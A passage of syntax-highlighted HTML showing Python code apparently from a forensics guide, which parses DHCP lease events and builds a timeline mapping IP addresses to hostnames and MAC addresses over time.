class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">event_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" 
style=\"color:hsl(139, 66%, 32%)\">'ip_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">  parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">    parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">:</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">6</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">replace</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'-'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">':'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">upper</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_file'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> os</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span 
class=\"token plain\">basename</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_file</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" 
style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">build_ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Build a timeline of which hostname held which IP at what time.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Essential for correlating IP addresses seen in other log sources.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ip_timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> defaultdict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ip -&gt; [(start_time, end_time, hostname, mac)]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    active_leases </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\">               </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ip -&gt; (start_time, hostname, mac)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> event </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ip </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ip_address'</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        hostname </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac_address'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Assign'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># New lease assigned: record start</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Previous lease ended without explicit release</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                prev_start</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">prev_start</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token 
plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> event</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Release'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Lease ended</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">pop</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> prev_mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Close any still-active leases</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 
47%)\">in</span><span class=\"token plain\"> active_leases</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">items</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># None = still active</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> ip_timeline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">resolve_ip_at_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> ip_address</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Given an IP address and a timestamp, return what hostname held that IP.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    The critical function for correlating 
network events to hostnames.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> ip_address </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> ip_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> end_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mac </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> ip_timeline</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">ip_address</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> start_ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> query_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> end_ts </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">is</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> query_time </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> end_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'hostname'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'mac'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> mac</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lease_start'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lease_end'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> end_ts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 
